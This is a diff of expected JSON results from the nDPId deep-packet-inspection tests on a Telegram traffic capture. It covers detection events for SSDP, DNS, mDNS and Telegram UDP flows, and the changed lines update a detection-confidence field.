00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1588779611355,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1588779611355,"pkt":"AQBef\/\/6jP5XIzfkCABFAACZH80AAAER55nAqAFL7\/\/\/+uI8B2wAhTXETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQo="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779611355,"flow_last_seen":1588779611355,"flow_idle_time":200000,"flow_min_l4_payload_len":125,"flow_max_l4_payload_len":125,"flow_tot_l4_payload_len":125,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1588779611355,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"239.255.255.250","src_port":57916,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779611355,"flow_last_seen":1588779611355,"flow_idle_time":200000,"flow_min_l4_payload_len":125,"flow_max_l4_payload_len":125,"flow_tot_l4_payload_len":125,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1588779611355,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"239.255.255.250","src_port":57916,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1588779611458,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1588779611458,"pkt":"AQBef\/\/6jP5XIzfkCABFAACZnzoAAAERaCzAqAFL7\/\/\/+uI8B2wAhTXETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQo="} 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1588779611657,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1588779611657,"pkt":"AQBef\/\/6jP5XIzfkCABFAACZ2TYAAAERLjDAqAFL7\/\/\/+uI8B2wAhTXETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQo="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615019,"flow_last_seen":1588779615019,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1588779615019,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61120,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1588779615019,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1588779615019,"pkt":"EBMx8Tl2KDc3AG3ICABFAABHiDkAAP8Rr83AqAFNwKgBAe7AADUAMxxUuQsBAAABAAAAAAAABWU0NTE4BGRzY3gKYWthbWFpZWRnZQNuZXQAAAEAAQ=="} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615019,"flow_last_seen":1588779615019,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1588779615019,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61120,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e4518.dscx.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615019,"flow_last_seen":1588779615019,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1588779615019,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61120,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e4518.dscx.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1588779615032,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1588779615032,"pkt":"KDc3AG3IEBMx8Tl2CABFAABXJ0xAADkRlqvAqAEBwKgBTQA17sAAQwAAuQuBgAABAAEAAAAABWU0NTE4BGRzY3gKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAA4ABFx69t8="} -00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":165,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779615019,"flow_last_seen":1588779615032,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779615032,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61120,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e4518.dscx.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.246.223"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":165,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779615019,"flow_last_seen":1588779615032,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779615032,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61120,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e4518.dscx.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.246.223"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"telegram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615961,"flow_last_seen":1588779615961,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1588779615961,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"telegram.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1588779615961,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1588779615961,"pkt":"AQBeAAD78KNaMBgSCABFAABNRwcAAP8R0cDAqAE04AAA+xTpFOkAOcUdAAAAAAACAAAAAAAABV9yYW9wBF90Y3AFbG9jYWwAAAyAAQhfYWlycGxhecASAAyAAQ=="} -00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"telegram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615961,"flow_last_seen":1588779615961,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1588779615961,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} +00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"telegram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615961,"flow_last_seen":1588779615961,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1588779615961,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"telegram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615962,"flow_last_seen":1588779615962,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1588779615962,"l3_proto":"ip6","src_ip":"fe80::4dc:edec:5b0c:a661","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"telegram.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1588779615962,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":111,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":111,"pkt_l4_len":57,"thread_ts_msec":1588779615962,"pkt":"MzMAAAD78KNaMBgSht1gBhFuADkR\/\/6AAAAAAAAABNzt7FsMpmH\/AgAAAAAAAAAAAAAAAAD7FOkU6QA5dUAAAAAAAAIAAAAAAAAFX3Jhb3AEX3RjcAVsb2NhbAAADIABCF9haXJwbGF5wBIADIAB"} -00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"telegram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615962,"flow_last_seen":1588779615962,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1588779615962,"l3_proto":"ip6","src_ip":"fe80::4dc:edec:5b0c:a661","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} +00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"telegram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615962,"flow_last_seen":1588779615962,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1588779615962,"l3_proto":"ip6","src_ip":"fe80::4dc:edec:5b0c:a661","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"telegram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.7","src_port":23174,"dst_port":521,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"telegram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1588779616036,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779616036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABERC0AAEARERTAqAFNW2wIB1qGAgkAMLAM3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/8o+UYRJgGi8A=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":170,"source":"telegram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.7","src_port":23174,"dst_port":521,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":170,"source":"telegram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.7","src_port":23174,"dst_port":521,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"telegram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":23174,"dst_port":523,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"telegram.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1588779616036,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779616036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEWYkAAEAR97nAqAFNW2wMBVqGAgsAMMZE3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/VYJzCLkR9XA=="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"telegram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":23174,"dst_port":523,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"telegram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":23174,"dst_port":523,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"telegram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":23174,"dst_port":527,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"telegram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1588779616036,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779616036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEZqwAAEAR5prAqAFNW2wQAVqGAg8AMLyJ3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/9u+DapRNA5DQ=="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"telegram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":23174,"dst_port":527,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"telegram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":23174,"dst_port":527,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"telegram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.1","src_port":23174,"dst_port":536,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"telegram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1588779616036,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779616036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEMZgAAEARH6\/AqAFNW2wMAVqGAhgAMB7S3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/8nsGAWUhbrUA=="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"telegram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.1","src_port":23174,"dst_port":536,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"telegram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.1","src_port":23174,"dst_port":536,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":174,"source":"telegram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":23174,"dst_port":538,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"telegram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1588779616036,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779616036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABECJIAAEARTK7AqAFNW2wICFqGAhoAMJgJ3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/8HjiXC2fxIoA=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"telegram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":23174,"dst_port":538,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"telegram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":23174,"dst_port":538,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"telegram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779616036,"flow_last_seen":1588779616036,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779616036,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.4","src_port":23174,"dst_port":538,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"telegram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1588779616036,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779616036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEVZYAAEAR963AqAFNW2wQBFqGAhoAMGBV3EwAKRVlt6y8I22p7aDVl\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/8kkP6VHClAVg=="} 